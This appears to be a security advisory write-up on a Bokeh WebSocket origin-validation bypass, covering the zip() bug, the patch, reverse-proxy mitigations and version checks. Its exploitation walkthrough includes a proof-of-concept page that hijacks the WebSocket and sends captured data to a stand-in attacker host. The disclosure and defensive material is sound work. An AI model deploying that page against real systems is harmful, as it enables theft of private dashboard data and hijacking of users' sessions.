Feb 26, 2026
Bokeh's WebSocket origin validator used Python's `zip()` function, which stops comparing when the shortest list ends. Attackers can register subdomains starting with a trusted name (e.g., `trustedsite.corp.attacker.com`) to trick the server into accepting the connection, leading to full session hijacking.
A logic error in the Bokeh interactive visualization library allows attackers to bypass WebSocket Origin validation. By exploiting Python's `zip()` function behavior, attackers can craft malicious subdomains that mimic trusted origins, enabling Cross-Site WebSocket Hijacking (CSWSH) to exfiltrate data or manipulate server-side state.
Bokeh is the darling of the Python data science world. It takes heavy, server-side computation and spits out beautiful, interactive HTML/JS visualizations. To make those sliders slide and those graphs update in real-time, Bokeh relies heavily on WebSockets. It’s a persistent pipe between the browser and the backend Python process.
But here is the thing about WebSockets: they don't adhere to the Same-Origin Policy (SOP) in the way XHR or Fetch does. A browser will happily open a WebSocket connection to any server a page points it at, carrying the user's cookies along for the ride. It is up to the server to look at the `Origin` header and say, "Hey, you're coming from evil.com, get lost."
If that check fails—or in this case, gets a little too lazy—you enter the realm of Cross-Site WebSocket Hijacking (CSWSH). It’s essentially CSRF on steroids. Instead of sending a single blind request (like "buy stock"), the attacker gets a full, two-way communication channel. They can read the response. They can see the data. In the context of Bokeh, that means they can watch your internal dashboard right alongside you.
The root cause of CVE-2026-21883 is a classic case of "it works for valid input, so ship it." The vulnerability lies in `src/bokeh/server/util.py`, specifically inside a function called `match_host`. This function is supposed to take the incoming `Origin` header and compare it against a configured allowlist.
The developers made a fatal assumption about Python's `zip()` function. For those uninitiated in Pythonic foot-guns, `zip(a, b)` takes two lists and iterates over them together. Crucially, it stops as soon as the shortest list is exhausted. It doesn't throw an error; it doesn't warn you. It just quietly packs up and goes home.
Imagine you have an allowlist containing `dashboard.corp`. You split that into `['dashboard', 'corp']`. Now imagine an attacker comes along with `dashboard.corp.evil.net`. Split that, and you get `['dashboard', 'corp', 'evil', 'net']`. When you `zip()` them, the loop runs twice. `'dashboard'` matches `'dashboard'`. `'corp'` matches `'corp'`. The loop finishes. The code hits `return True`. The server opens the door wide.
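The truncation is easy to reproduce in isolation. The snippet below is a minimal sketch using the example hostnames from the paragraph above; it only demonstrates `zip()` and is not Bokeh's code.

```python
# Label lists for the allowlisted name and the attacker-controlled name.
pattern_parts = "dashboard.corp".split(".")
host_parts = "dashboard.corp.evil.net".split(".")

# zip() stops at the shorter input, so only two pairs are produced.
pairs = list(zip(host_parts, pattern_parts))
print(pairs)  # [('dashboard', 'dashboard'), ('corp', 'corp')]

# Every compared pair matches, even though the hostnames differ.
all_match = all(h == p for h, p in pairs)
print(all_match)  # True

# The labels that were never compared at all.
ignored = host_parts[len(pattern_parts):]
print(ignored)  # ['evil', 'net']
```

The last line is the whole bug in miniature: the attacker-controlled labels never take part in the comparison.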
Let's look at the crime scene. The `match_host` function was trying to be clever by splitting hostnames by periods to handle subdomains and wildcards. Here is the logic that doomed it:

    # The Vulnerable Logic
    def match_host(host: str, pattern: str) -> bool:
        host_parts = host.split('.')
        pattern_parts = pattern.split('.')
        # They checked if the pattern was longer than the host...
        if len(pattern_parts) > len(host_parts):
            return False
        # ...but forgot to check if the HOST was longer than the PATTERN.
        for h, p in zip(host_parts, pattern_parts):
            if h == p or p == '*':
                continue
            else:
                return False
        return True

See the gap? If `host_parts` is longer than `pattern_parts`, `zip` just ignores the extra parts (the `.evil.net` part). The code assumes that if it survived the loop, it's a match.
The fix (Commit cedd113) is almost comically simple. It enforces that the lengths must match exactly (unless wildcards are involved, which are handled separately).

    # The Fix
    -    if len(pattern_parts) > len(host_parts):
    -        return False
    +    if len(pattern_parts) != len(host_parts):
    +        return False

This one-operator change (`>` to `!=`) closes the vulnerability completely. It forces the validation to account for the entire hostname provided by the client.
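For reference, here is a sketch of the function with the stricter length check applied. It is reconstructed from the snippets above rather than copied from the Bokeh source, so the real function may handle ports, wildcards, and other cases differently. The name `match_host_strict` is hypothetical, and treating `*` as matching exactly one label is an assumption of this sketch.

```python
def match_host_strict(host: str, pattern: str) -> bool:
    """Return True only if every label of host matches the pattern.

    Hypothetical name; a sketch of the patched logic, not Bokeh's code.
    """
    host_parts = host.split(".")
    pattern_parts = pattern.split(".")

    # Reject any length mismatch, in either direction.
    if len(pattern_parts) != len(host_parts):
        return False

    # Lengths are equal here, so zip() can no longer drop trailing labels.
    for h, p in zip(host_parts, pattern_parts):
        if h != p and p != "*":
            return False
    return True


print(match_host_strict("dashboard.corp", "dashboard.corp"))           # True
print(match_host_strict("dashboard.corp.evil.net", "dashboard.corp"))  # False
print(match_host_strict("foo.corp", "*.corp"))                         # True
```

On Python 3.10 and later, `zip(host_parts, pattern_parts, strict=True)` raises `ValueError` on a length mismatch instead of truncating, which would turn this class of bug into a loud failure rather than a silent pass.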
Exploiting this requires a bit of setup, but it is highly realistic in corporate environments where internal DNS names are predictable. Let's assume a target organization runs a Bokeh server at ws://analytics.internal.corp.
Step 1: Reconnaissance
The attacker needs to know the allowlist. Often, this is the FQDN of the server itself. If the server expects analytics.internal.corp, that is our target string.
Step 2: Infrastructure
The attacker registers a domain or configures a subdomain they control to start with the target string. For example, they register attacker.com and create a subdomain: analytics.internal.corp.attacker.com.
Step 3: The Trap
The attacker hosts a simple HTML page on `analytics.internal.corp.attacker.com`:

    <!-- Hosted on attacker's domain -->
    <script>
      // Browser sends Origin: http://analytics.internal.corp.attacker.com
      var ws = new WebSocket("ws://analytics.internal.corp/ws");
      ws.onopen = function() {
        console.log("We are in.");
      };
      ws.onmessage = function(msg) {
        // Exfiltrate sensitive dashboard data to attacker server
        fetch("https://attacker.com/log", { method: "POST", body: msg.data });
      };
    </script>

Step 4: Execution
The attacker sends the link to a victim who has access to the internal analytics dashboard. When the victim clicks, the WebSocket handshake initiates. The browser sends the attacker's domain as the Origin. The Bokeh server, blinded by the zip() flaw, sees analytics.internal.corp... and approves the connection. The attacker now receives a live feed of the victim's data.
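To see why the handshake is approved, the server-side decision can be simulated offline. This is a sketch under assumptions: `vulnerable_match_host` restates the flawed logic shown earlier, `origin_allowed` is a hypothetical helper, and extracting the hostname with `urllib.parse.urlsplit` is an illustrative choice that may differ from what Bokeh actually does.

```python
from urllib.parse import urlsplit


def vulnerable_match_host(host: str, pattern: str) -> bool:
    """Restatement of the flawed pre-patch comparison, for illustration."""
    host_parts = host.split(".")
    pattern_parts = pattern.split(".")
    if len(pattern_parts) > len(host_parts):
        return False
    # zip() silently ignores any extra labels in host_parts.
    for h, p in zip(host_parts, pattern_parts):
        if h != p and p != "*":
            return False
    return True


def origin_allowed(origin: str, allowlist: list[str]) -> bool:
    """Hypothetical helper: extract the hostname from an Origin header value."""
    host = urlsplit(origin).hostname or ""
    return any(vulnerable_match_host(host, pattern) for pattern in allowlist)


allowlist = ["analytics.internal.corp"]
legit = origin_allowed("http://analytics.internal.corp", allowlist)
spoofed = origin_allowed("http://analytics.internal.corp.attacker.com", allowlist)
unrelated = origin_allowed("http://evil.com", allowlist)
print(legit, spoofed, unrelated)  # True True False
```

An unrelated origin is still rejected, which is why the flaw can survive casual testing: only hostnames that begin with an allowlisted name get through.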
You might think, "So what? They see a scatter plot." But Bokeh is an interactive library. The communication channel handles events. If the dashboard has widgets—buttons that trigger database refreshes, sliders that adjust parameters, or text inputs that run queries—the attacker can trigger those too.
Because WebSockets are bidirectional, the attacker can send messages to the server as if they were the user. In a worst-case scenario where the dashboard allows executing SQL queries or Python code based on input (which is bad design, but we see it constantly), this becomes Remote Code Execution (RCE) or SQL Injection via WebSocket.
Even without RCE, the confidentiality loss is massive. These dashboards often display proprietary trading data, patient health metrics, or infrastructure status. Bypassing the Origin check effectively bypasses the firewall for the application layer.
If you are running Bokeh <= 3.8.1, you are vulnerable. The primary fix is to upgrade to 3.8.2 or later immediately. The patch is small and safe to backport if you are stuck on a legacy version.
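A quick way to triage an environment is to compare the installed version against the fixed release. The sketch below is a simplification: `is_vulnerable` is a hypothetical helper that compares only the leading release numbers, so pre-release or development builds would need a real version parser such as the `packaging` library.

```python
import re
from importlib.metadata import PackageNotFoundError, version

FIXED = (3, 8, 2)  # first fixed release, per the advisory


def is_vulnerable(version_string: str) -> bool:
    """Hypothetical helper: True if the release number predates the fix.

    Only the leading X.Y[.Z] numbers are compared; suffixes such as
    "rc1" or ".dev0" are ignored, which is a simplification.
    """
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version_string)
    if m is None:
        raise ValueError(f"unrecognized version: {version_string!r}")
    release = tuple(int(g or 0) for g in m.groups())
    return release < FIXED


try:
    installed = version("bokeh")
except PackageNotFoundError:
    print("bokeh is not installed in this environment")
else:
    status = "vulnerable" if is_vulnerable(installed) else "patched"
    print(f"bokeh {installed}: {status}")
```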
However, relying solely on application-level checks is playing with fire. You should enforce Origin validation at your ingress point—your reverse proxy.
If you use Nginx, a fully anchored pattern is your friend:

    location /ws {
        proxy_pass http://backend;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
        # Strict check: the pattern is anchored at both ends (^ and $),
        # so a suffix such as .attacker.com cannot slip through.
        if ($http_origin !~* "^https?://(analytics\.internal\.corp)$") {
            return 403;
        }
    }

By killing the request at the Nginx layer, the vulnerable Python code never even executes. Defense in depth means never trusting a `zip()` loop with your perimeter security.
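Before deploying a rule like this, it is worth testing the pattern against hostile inputs. The sketch below checks the same regular expression with Python's `re` module, using `re.IGNORECASE` to approximate Nginx's case-insensitive `~*` operator. Nginx uses PCRE rather than Python's engine, so treat this as an approximation; `proxy_would_allow` is a hypothetical helper and the test origins are made up for illustration.

```python
import re

# Same pattern as the Nginx rule above; IGNORECASE mirrors "~*".
ORIGIN_RE = re.compile(r"^https?://(analytics\.internal\.corp)$", re.IGNORECASE)


def proxy_would_allow(origin: str) -> bool:
    """Hypothetical helper: True if the proxy rule would let this Origin through."""
    return ORIGIN_RE.search(origin) is not None


candidates = [
    "https://analytics.internal.corp",
    "http://ANALYTICS.internal.corp",
    "http://analytics.internal.corp.attacker.com",
    "https://analytics.internal.corp:5006",
    "",  # request with no Origin header
]
for origin in candidates:
    verdict = "allow" if proxy_would_allow(origin) else "403"
    print(f"{origin!r} -> {verdict}")
```

Note that an Origin with an explicit port, such as `https://analytics.internal.corp:5006`, is also rejected by this pattern, as is a request with no Origin header at all. Extend the pattern if the dashboard is served on a non-default port.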
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U

| Product | Affected Versions | Fixed Version |
|---|---|---|
| Bokeh (Bokeh Project) | <= 3.8.1 | 3.8.2 |

| Attribute | Detail |
|---|---|
| CWE ID | CWE-1385 |
| Attack Vector | Network |
| CVSS Score | 4.5 (Medium) |
| Impact | Data Exfiltration / Session Hijacking |
| Root Cause | Logic Error in List Iteration |
| Patch Status | Available (v3.8.2) |

CWE-1385 (Missing Origin Validation in WebSockets): The application does not verify or incorrectly verifies the Origin header of a WebSocket connection, allowing an attacker to establish a connection from an unauthorized origin.